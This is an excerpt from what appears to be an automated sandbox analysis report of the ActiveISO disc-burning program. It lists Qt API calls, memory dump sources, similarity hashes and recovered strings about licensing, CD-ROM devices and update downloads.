                                                                                                                  • ?fromAscii_helper@QString@@CAPEAU?$QTypedArrayData@G@@PEBDH@Z.QT5CORE ref: 00007FF6537423BF
                                                                                                                  • ?fromAscii_helper@QString@@CAPEAU?$QTypedArrayData@G@@PEBDH@Z.QT5CORE ref: 00007FF6537423D6
                                                                                                                  • ??0QByteArray@@QEAA@AEBV0@@Z.QT5CORE ref: 00007FF6537423EC
                                                                                                                  • ?replace@QString@@QEAAAEAV1@AEBV1@0W4CaseSensitivity@Qt@@@Z.QT5CORE ref: 00007FF653742409
                                                                                                                  • ??0QVariant@@QEAA@AEBVQString@@@Z.QT5CORE ref: 00007FF653742417
                                                                                                                  • ?fromAscii_helper@QString@@CAPEAU?$QTypedArrayData@G@@PEBDH@Z.QT5CORE ref: 00007FF65374242A
                                                                                                                  • ?setValue@QSettings@@QEAAXAEBVQString@@AEBVQVariant@@@Z.QT5CORE ref: 00007FF65374244A
                                                                                                                  • ??1QString@@QEAA@XZ.QT5CORE ref: 00007FF653742459
                                                                                                                  • ??1QVariant@@QEAA@XZ.QT5CORE ref: 00007FF653742465
                                                                                                                  • ??1QString@@QEAA@XZ.QT5CORE ref: 00007FF653742471
                                                                                                                  • ??1QString@@QEAA@XZ.QT5CORE ref: 00007FF653742480
                                                                                                                  • ??1QString@@QEAA@XZ.QT5CORE ref: 00007FF65374248C
                                                                                                                  • ??1QSettings@@UEAA@XZ.QT5CORE ref: 00007FF653742498
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000008.00000002.1341205041.00007FF653711000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF653710000, based on PE: true
                                                                                                                  • Associated: 00000008.00000002.1341125497.00007FF653710000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000008.00000002.1341509504.00007FF653773000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000008.00000002.1341509504.00007FF65378B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000008.00000002.1341614210.00007FF6537E1000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000008.00000002.1341632616.00007FF6537E4000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000008.00000002.1341683179.00007FF6537E5000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000008.00000002.1341720320.00007FF6537E9000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_8_2_7ff653710000_ActiveISO.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: String@@$?fromArrayAscii_helper@Data@Settings@@Typed$?setString@@@Variant@@$?begin?replace@Array@@ByteCaseCodec@Format@0@Group@Object@@@Qt@@@Sensitivity@V0@@V1@0Value@Variant@@@
                                                                                                                  • String ID: ActiveRequest
                                                                                                                  • API String ID: 1163770662-559858530
                                                                                                                  • Opcode ID: 74e24631b68fb6922d41da092d14c5adf0555e476984d8a0780725590cec3bbd
                                                                                                                  • Instruction ID: c4542708eb4b356898684cc40d84abbb6bd2571d51a01e2f9cfb3e78f212b4f2
                                                                                                                  • Opcode Fuzzy Hash: 74e24631b68fb6922d41da092d14c5adf0555e476984d8a0780725590cec3bbd
                                                                                                                  • Instruction Fuzzy Hash: D1312F22A28A4192E710DB60F8962AA7722FBD5F51F844131E19FE2AB4DF3CD54DC784
                                                                                                                  APIs
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000008.00000002.1341205041.00007FF653711000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF653710000, based on PE: true
                                                                                                                  • Associated: 00000008.00000002.1341125497.00007FF653710000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000008.00000002.1341509504.00007FF653773000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000008.00000002.1341509504.00007FF65378B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000008.00000002.1341614210.00007FF6537E1000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000008.00000002.1341632616.00007FF6537E4000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000008.00000002.1341683179.00007FF6537E5000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000008.00000002.1341720320.00007FF6537E9000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_8_2_7ff653710000_ActiveISO.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: Object@@$Network$Connection@Meta$?connect@ConnectionQt@@@Request@@String@@Type@Url@@$?get@AccessArray@@ByteManager@@Mode@0@@ParsingReply@@Request@@@Url@@@V0@@
                                                                                                                  • String ID: 1replyFinished(QNetworkReply*)$1slotReadyReadDownloadUpdate()$2finished(QNetworkReply*)$2readyRead()
                                                                                                                  • API String ID: 1055408132-557232526
                                                                                                                  • Opcode ID: 85d7c09891e4d4f1e76790752830503deb281fe03b70c5291d12ca303555d46a
                                                                                                                  • Instruction ID: d9d84b16027fcbd9e0b85278ade5275ed54e0d2241fc10e046882e6eccd10d00
                                                                                                                  • Opcode Fuzzy Hash: 85d7c09891e4d4f1e76790752830503deb281fe03b70c5291d12ca303555d46a
                                                                                                                  • Instruction Fuzzy Hash: 09215372928B41D6EB009F51E8452AA7362FF98F65F440232D55EF36A8EF3CD548CB84
                                                                                                                  APIs
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000008.00000002.1341205041.00007FF653711000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF653710000, based on PE: true
                                                                                                                  • Associated: 00000008.00000002.1341125497.00007FF653710000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000008.00000002.1341509504.00007FF653773000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000008.00000002.1341509504.00007FF65378B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000008.00000002.1341614210.00007FF6537E1000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000008.00000002.1341632616.00007FF6537E4000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000008.00000002.1341683179.00007FF6537E5000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000008.00000002.1341720320.00007FF6537E9000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_8_2_7ff653710000_ActiveISO.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: Object@@$Network$Connection@Meta$?connect@ConnectionQt@@@Request@@String@@Type@Url@@$?get@AccessArray@@ByteManager@@Mode@0@@ParsingReply@@Request@@@Url@@@V0@@
                                                                                                                  • String ID: 1replyFinished(QNetworkReply*)$1slotReadyReadDownloadInfo()$2finished(QNetworkReply*)$2readyRead()
                                                                                                                  • API String ID: 1055408132-3389150819
                                                                                                                  • Opcode ID: 7e2c2c8fb15b7d7aa6b4e6809550ff12e80d4edde2d2550423c43202355756ab
                                                                                                                  • Instruction ID: 5653b88bb811f00ded7b5b10c23708c9ffeb3d4b6483f9dc8abc6be04baa1edc
                                                                                                                  • Opcode Fuzzy Hash: 7e2c2c8fb15b7d7aa6b4e6809550ff12e80d4edde2d2550423c43202355756ab
                                                                                                                  • Instruction Fuzzy Hash: E6214172928B42D2EB009F91E8451AA7362FF98F65F440131D55EF3664EF3CD548CB84
                                                                                                                  APIs
                                                                                                                  • ?fromAscii_helper@QString@@CAPEAU?$QTypedArrayData@G@@PEBDH@Z.QT5CORE ref: 00007FF653742CA6
                                                                                                                    • Part of subcall function 00007FF653746CB0: ??0QSettings@@QEAA@AEBVQString@@W4Format@0@PEAVQObject@@@Z.QT5CORE ref: 00007FF653746CE1
                                                                                                                    • Part of subcall function 00007FF653746CB0: ?setIniCodec@QSettings@@QEAAXPEBD@Z.QT5CORE ref: 00007FF653746CFC
                                                                                                                    • Part of subcall function 00007FF653746CB0: ?fromAscii_helper@QString@@CAPEAU?$QTypedArrayData@G@@PEBDH@Z.QT5CORE ref: 00007FF653746D17
                                                                                                                    • Part of subcall function 00007FF653746CB0: ?beginGroup@QSettings@@QEAAXAEBVQString@@@Z.QT5CORE ref: 00007FF653746D2A
                                                                                                                    • Part of subcall function 00007FF653746CB0: ??1QString@@QEAA@XZ.QT5CORE ref: 00007FF653746D36
                                                                                                                    • Part of subcall function 00007FF653746CB0: ??1QString@@QEAA@XZ.QT5CORE ref: 00007FF653746D4E
                                                                                                                  • ?fromAscii_helper@QString@@CAPEAU?$QTypedArrayData@G@@PEBDH@Z.QT5CORE ref: 00007FF653742CCD
                                                                                                                  • ?remove@QSettings@@QEAAXAEBVQString@@@Z.QT5CORE ref: 00007FF653742CE2
                                                                                                                  • ??1QString@@QEAA@XZ.QT5CORE ref: 00007FF653742CEE
                                                                                                                  • ?fromAscii_helper@QString@@CAPEAU?$QTypedArrayData@G@@PEBDH@Z.QT5CORE ref: 00007FF653742D00
                                                                                                                  • ?remove@QSettings@@QEAAXAEBVQString@@@Z.QT5CORE ref: 00007FF653742D15
                                                                                                                  • ??1QString@@QEAA@XZ.QT5CORE ref: 00007FF653742D21
                                                                                                                  • ??4QString@@QEAAAEAV0@PEBD@Z.QT5CORE ref: 00007FF653742D35
                                                                                                                  • ?fromAscii_helper@QString@@CAPEAU?$QTypedArrayData@G@@PEBDH@Z.QT5CORE ref: 00007FF653742D47
                                                                                                                  • ?remove@QSettings@@QEAAXAEBVQString@@@Z.QT5CORE ref: 00007FF653742D5C
                                                                                                                  • ??1QString@@QEAA@XZ.QT5CORE ref: 00007FF653742D68
                                                                                                                  • ??1QSettings@@UEAA@XZ.QT5CORE ref: 00007FF653742D74
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000008.00000002.1341205041.00007FF653711000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF653710000, based on PE: true
                                                                                                                  • Associated: 00000008.00000002.1341125497.00007FF653710000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000008.00000002.1341509504.00007FF653773000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000008.00000002.1341509504.00007FF65378B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000008.00000002.1341614210.00007FF6537E1000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000008.00000002.1341632616.00007FF6537E4000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000008.00000002.1341683179.00007FF6537E5000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000008.00000002.1341720320.00007FF6537E9000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_8_2_7ff653710000_ActiveISO.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: String@@$Settings@@$?fromArrayAscii_helper@Data@Typed$String@@@$?remove@$?begin?setCodec@Format@0@Group@Object@@@
                                                                                                                  • String ID: License$RegKey$Registered
                                                                                                                  • API String ID: 193423429-3563024231
                                                                                                                  • Opcode ID: 3b4fedc48722d83e6ee83333661d50fbfcf1babb45b65bb84588d7dc1d5eef2a
                                                                                                                  • Instruction ID: 73ef655d2ac89f3c78301801e17d64a7d8c5fb8fab719b491957675cf363bfdd
                                                                                                                  • Opcode Fuzzy Hash: 3b4fedc48722d83e6ee83333661d50fbfcf1babb45b65bb84588d7dc1d5eef2a
                                                                                                                  • Instruction Fuzzy Hash: 9521E322E18A42D1E710DB50F896069B732FBD5B65F880231E19EF2AB4DF7CD549C748
                                                                                                                  APIs
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000008.00000002.1341205041.00007FF653711000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF653710000, based on PE: true
                                                                                                                  • Associated: 00000008.00000002.1341125497.00007FF653710000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000008.00000002.1341509504.00007FF653773000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000008.00000002.1341509504.00007FF65378B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000008.00000002.1341614210.00007FF6537E1000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000008.00000002.1341632616.00007FF6537E4000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000008.00000002.1341683179.00007FF6537E5000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000008.00000002.1341720320.00007FF6537E9000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_8_2_7ff653710000_ActiveISO.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: memset$Burn_ByteCharDestroyDeviceDriveMultiQueryStarTypeWide__stdio_common_vsprintf__stdio_common_vsscanf_invalid_parameter_noinfo_noreturn
                                                                                                                  • String ID: %C:$CdRom%u$\Device\CdRom$\Device\CdRom%u
                                                                                                                  • API String ID: 3448082987-4202350246
                                                                                                                  • Opcode ID: b06c3c67cc115b1a661e46fa6b3ae3c9c120abcb2840d91e9833777cafec9172
                                                                                                                  • Instruction ID: 0b0e75d4aaef9978c9b706dc8224843e2128cadee994772a6556debeee2a8f0a
                                                                                                                  • Opcode Fuzzy Hash: b06c3c67cc115b1a661e46fa6b3ae3c9c120abcb2840d91e9833777cafec9172
                                                                                                                  • Instruction Fuzzy Hash: 4181B532B24AC288EB20CF65D8513ED6762FB45BA4F840231DA5DB7AD8DF78D245C744
                                                                                                                  APIs
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000008.00000002.1341205041.00007FF653711000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF653710000, based on PE: true
                                                                                                                  • Associated: 00000008.00000002.1341125497.00007FF653710000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000008.00000002.1341509504.00007FF653773000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000008.00000002.1341509504.00007FF65378B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000008.00000002.1341614210.00007FF6537E1000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000008.00000002.1341632616.00007FF6537E4000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000008.00000002.1341683179.00007FF6537E5000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000008.00000002.1341720320.00007FF6537E9000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_8_2_7ff653710000_ActiveISO.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: Burn_Star$ArrayBurnerCdvdCreateGrabber_String@@$?from$Ascii_helper@Data@Typed$?allocate@AllocationArray@@Bit@ByteData@@Data@@@@@DestroyFlags@Local8Option@U1@_V0@$$V0@@
                                                                                                                  • String ID: $ $Cannot create device$Device created
                                                                                                                  • API String ID: 3598334293-2311590863
                                                                                                                  • Opcode ID: 5573d33543940e263bafa49864d870196283b32ec65cea1dc8b7a99cd15aeec7
                                                                                                                  • Instruction ID: 659e38c228f4a8eb2e398c4b7140bf95cfaef5f556cf7f2355c9163d98ed3e5d
                                                                                                                  • Opcode Fuzzy Hash: 5573d33543940e263bafa49864d870196283b32ec65cea1dc8b7a99cd15aeec7
                                                                                                                  • Instruction Fuzzy Hash: 9A61603292CB8186E720CF20E4512AEB7A6F785B84F580136EB8DA7B59DF3CD545CB44
                                                                                                                  APIs
                                                                                                                  Strings
                                                                                                                  • Installation file being downloaded previously detected locally:<br><br><b>%1</b><br><br>Do you want to execute it <b>[Yes]</b> or download it again <b>[No]</b>?, xrefs: 00007FF653750C5E
                                                                                                                  • Detected local setup, xrefs: 00007FF653750CA7
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000008.00000002.1341205041.00007FF653711000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF653710000, based on PE: true
                                                                                                                  • Associated: 00000008.00000002.1341125497.00007FF653710000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000008.00000002.1341509504.00007FF653773000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000008.00000002.1341509504.00007FF65378B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000008.00000002.1341614210.00007FF6537E1000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000008.00000002.1341632616.00007FF6537E4000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000008.00000002.1341683179.00007FF6537E5000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000008.00000002.1341720320.00007FF6537E9000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_8_2_7ff653710000_ActiveISO.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: String@@$Array@@ByteChar@@@MessageStandardV0@@Widget@@$?arg@?close@?remove@?tr@?warning@?wizard@Box@@Box@@@@Button@Button@1@Char@@File@@Flags@Latin1MetaObject@@Page@@String@@1String@@@W421@@WizardWizard@@
                                                                                                                  • String ID: Detected local setup$Installation file being downloaded previously detected locally:<br><br><b>%1</b><br><br>Do you want to execute it <b>[Yes]</b> or download it again <b>[No]</b>?
                                                                                                                  • API String ID: 4234484585-1710264342
                                                                                                                  • Opcode ID: ef8df9e83ddfbf22bd0f0e59f593d9f846a2f5b29a63013bd7e0ae3bf0b2d350
                                                                                                                  • Instruction ID: e49822b32010efd173a4744b0af1db5a19c3edf4b67374e1b7a1e2781d9f6d09
                                                                                                                  • Opcode Fuzzy Hash: ef8df9e83ddfbf22bd0f0e59f593d9f846a2f5b29a63013bd7e0ae3bf0b2d350
                                                                                                                  • Instruction Fuzzy Hash: 3B31D622E28A4196F6149B25E8965B96722EF85FD0F080130EE2FB7BE4DF2CD545C348
                                                                                                                  APIs
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000008.00000002.1341205041.00007FF653711000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF653710000, based on PE: true
                                                                                                                  • Associated: 00000008.00000002.1341125497.00007FF653710000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000008.00000002.1341509504.00007FF653773000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000008.00000002.1341509504.00007FF65378B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000008.00000002.1341614210.00007FF6537E1000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000008.00000002.1341632616.00007FF6537E4000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000008.00000002.1341683179.00007FF6537E5000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000008.00000002.1341720320.00007FF6537E9000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_8_2_7ff653710000_ActiveISO.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: String@@$?fromArrayAscii_helper@Data@Typed$Settings@@$Array@@ByteV0@@
                                                                                                                  • String ID: Address$Demo$Registered
                                                                                                                  • API String ID: 1954020858-2398193843
                                                                                                                  • Opcode ID: f7cf7e0167ceb43581851f3f18374140b3f946a09b161d31059d7dbc290bb75a
                                                                                                                  • Instruction ID: 8b7f8af00e6ebe4862d18f973b222b98aeaf96867f621bb109ece0cd64dd8cbf
                                                                                                                  • Opcode Fuzzy Hash: f7cf7e0167ceb43581851f3f18374140b3f946a09b161d31059d7dbc290bb75a
                                                                                                                  • Instruction Fuzzy Hash: 70314432E1DA4292EB10DB50E4562B9A762FBC0B54F884131E19EF36E4EF7CE558C748
                                                                                                                  APIs
                                                                                                                    • Part of subcall function 00007FF65374A100: ?qRegisterResourceData@@YA_NHPEBE00@Z.QT5CORE(00007FF653741824), ref: 00007FF65374A11E
                                                                                                                    • Part of subcall function 00007FF6537468F0: ??0QChar@@QEAA@H@Z.QT5CORE(?,?,?,?,?,0000000F), ref: 00007FF653746923
                                                                                                                    • Part of subcall function 00007FF6537468F0: ?split@QString@@QEBA?AVQStringList@@VQChar@@W4SplitBehavior@1@W4CaseSensitivity@Qt@@@Z.QT5CORE ref: 00007FF65374693F
                                                                                                                    • Part of subcall function 00007FF6537468F0: ?begin@QListData@@QEBAPEAPEAXXZ.QT5CORE ref: 00007FF653746957
                                                                                                                    • Part of subcall function 00007FF6537468F0: ?end@QListData@@QEBAPEAPEAXXZ.QT5CORE ref: 00007FF653746965
                                                                                                                    • Part of subcall function 00007FF6537468F0: ??0QByteArray@@QEAA@AEBV0@@Z.QT5CORE ref: 00007FF653746995
                                                                                                                    • Part of subcall function 00007FF6537468F0: ?toLong@QString@@QEBAJPEA_NH@Z.QT5CORE ref: 00007FF6537469B3
                                                                                                                    • Part of subcall function 00007FF6537468F0: ?toLong@QString@@QEBAJPEA_NH@Z.QT5CORE ref: 00007FF6537469D0
                                                                                                                    • Part of subcall function 00007FF6537468F0: ??1QString@@QEAA@XZ.QT5CORE ref: 00007FF6537469FC
                                                                                                                    • Part of subcall function 00007FF6537468F0: ??1QString@@QEAA@XZ.QT5CORE ref: 00007FF653746A67
                                                                                                                  • ??4QString@@QEAAAEAV0@PEBD@Z.QT5CORE ref: 00007FF65374184D
                                                                                                                  • ??4QString@@QEAAAEAV0@PEBD@Z.QT5CORE ref: 00007FF653741EF5
                                                                                                                  • ??4QString@@QEAAAEAV0@PEBD@Z.QT5CORE ref: 00007FF653741F09
                                                                                                                  • ?tr@QObject@@SA?AVQString@@PEBD0H@Z.QT5CORE ref: 00007FF653741F21
                                                                                                                  • ??4QByteArray@@QEAAAEAV0@$$QEAV0@@Z.QT5CORE ref: 00007FF653741F31
                                                                                                                  • ??1QString@@QEAA@XZ.QT5CORE ref: 00007FF653741F3B
                                                                                                                  • ?tr@QObject@@SA?AVQString@@PEBD0H@Z.QT5CORE ref: 00007FF653741F53
                                                                                                                  • ??4QByteArray@@QEAAAEAV0@$$QEAV0@@Z.QT5CORE ref: 00007FF653741F63
                                                                                                                  • ??1QString@@QEAA@XZ.QT5CORE ref: 00007FF653741F6D
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000008.00000002.1341205041.00007FF653711000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF653710000, based on PE: true
                                                                                                                  • Associated: 00000008.00000002.1341125497.00007FF653710000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000008.00000002.1341509504.00007FF653773000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000008.00000002.1341509504.00007FF65378B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000008.00000002.1341614210.00007FF6537E1000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000008.00000002.1341632616.00007FF6537E4000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000008.00000002.1341683179.00007FF6537E5000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000008.00000002.1341720320.00007FF6537E9000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_8_2_7ff653710000_ActiveISO.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: String@@$Array@@ByteData@@V0@@$?tr@Char@@ListLong@Object@@V0@$$$?begin@?end@?split@Behavior@1@CaseE00@List@@Qt@@@RegisterResourceSensitivity@SplitString
                                                                                                                  • String ID: Active@ Undefined$DEMO$DEMO version. $license.txt$www.lsoft.net
                                                                                                                  • API String ID: 167484885-1296611838
                                                                                                                  • Opcode ID: 7408d0514f94fc0053a33fe7b217abe94b70fa4e059625e840afdf934f0ab398
                                                                                                                  • Instruction ID: 0b514ffd3910721a0e000116603572c38eef8ea09363e6840f7362ba0bfd4fb3
                                                                                                                  • Opcode Fuzzy Hash: 7408d0514f94fc0053a33fe7b217abe94b70fa4e059625e840afdf934f0ab398
                                                                                                                  • Instruction Fuzzy Hash: 3D316D71E28A4795FB00DB24E8960A43326FF44FA4B8D1132E54DB7A64DF7CE149C788
                                                                                                                  APIs
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000008.00000002.1341205041.00007FF653711000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF653710000, based on PE: true
                                                                                                                  • Associated: 00000008.00000002.1341125497.00007FF653710000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000008.00000002.1341509504.00007FF653773000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000008.00000002.1341509504.00007FF65378B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000008.00000002.1341614210.00007FF6537E1000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000008.00000002.1341632616.00007FF6537E4000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000008.00000002.1341683179.00007FF6537E5000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000008.00000002.1341720320.00007FF6537E9000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_8_2_7ff653710000_ActiveISO.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: memset$Burn_DestroyDeviceDriveQueryStarType__stdio_common_vsprintf__stdio_common_vsscanf_invalid_parameter_noinfo_noreturnstrstr
                                                                                                                  • String ID: %C:$CdRom%u$\Device\CdRom$\Device\CdRom%u
                                                                                                                  • API String ID: 4083209492-4202350246
                                                                                                                  • Opcode ID: dcd8623065929db81b326ec4cb369df3133e7c80a3c9245fbe84383b9feee1b4
                                                                                                                  • Instruction ID: 333d39e0c13fc731c71bcef395ff5878d7f47e6e48a0b3c8c28f46c3c3d3445f
                                                                                                                  • Opcode Fuzzy Hash: dcd8623065929db81b326ec4cb369df3133e7c80a3c9245fbe84383b9feee1b4
                                                                                                                  • Instruction Fuzzy Hash: 8C61B232B24AC298EB20DF65D8913ED2362FB45BA4F440231E65DBBAD8DF78D245C344
                                                                                                                  APIs
                                                                                                                    • Part of subcall function 00007FF6537468F0: ??0QChar@@QEAA@H@Z.QT5CORE(?,?,?,?,?,0000000F), ref: 00007FF653746923
                                                                                                                    • Part of subcall function 00007FF6537468F0: ?split@QString@@QEBA?AVQStringList@@VQChar@@W4SplitBehavior@1@W4CaseSensitivity@Qt@@@Z.QT5CORE ref: 00007FF65374693F
                                                                                                                    • Part of subcall function 00007FF6537468F0: ?begin@QListData@@QEBAPEAPEAXXZ.QT5CORE ref: 00007FF653746957
                                                                                                                    • Part of subcall function 00007FF6537468F0: ?end@QListData@@QEBAPEAPEAXXZ.QT5CORE ref: 00007FF653746965
                                                                                                                    • Part of subcall function 00007FF6537468F0: ??0QByteArray@@QEAA@AEBV0@@Z.QT5CORE ref: 00007FF653746995
                                                                                                                    • Part of subcall function 00007FF6537468F0: ?toLong@QString@@QEBAJPEA_NH@Z.QT5CORE ref: 00007FF6537469B3
                                                                                                                    • Part of subcall function 00007FF6537468F0: ?toLong@QString@@QEBAJPEA_NH@Z.QT5CORE ref: 00007FF6537469D0
                                                                                                                    • Part of subcall function 00007FF6537468F0: ??1QString@@QEAA@XZ.QT5CORE ref: 00007FF6537469FC
                                                                                                                    • Part of subcall function 00007FF6537468F0: ??1QString@@QEAA@XZ.QT5CORE ref: 00007FF653746A67
                                                                                                                  • ??0QChar@@QEAA@UQLatin1Char@@@Z.QT5CORE(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF65374CE65), ref: 00007FF65374E769
                                                                                                                  • ?arg@QString@@QEBA?AV1@AEBV1@HVQChar@@@Z.QT5CORE(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF65374CE65), ref: 00007FF65374E785
                                                                                                                  • ?setText@QLabel@@QEAAXAEBVQString@@@Z.QT5WIDGETS(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF65374CE65), ref: 00007FF65374E793
                                                                                                                  • ??1QString@@QEAA@XZ.QT5CORE(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF65374CE65), ref: 00007FF65374E79F
                                                                                                                  • ??1QString@@QEAA@XZ.QT5CORE(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF65374CE65), ref: 00007FF65374E7AB
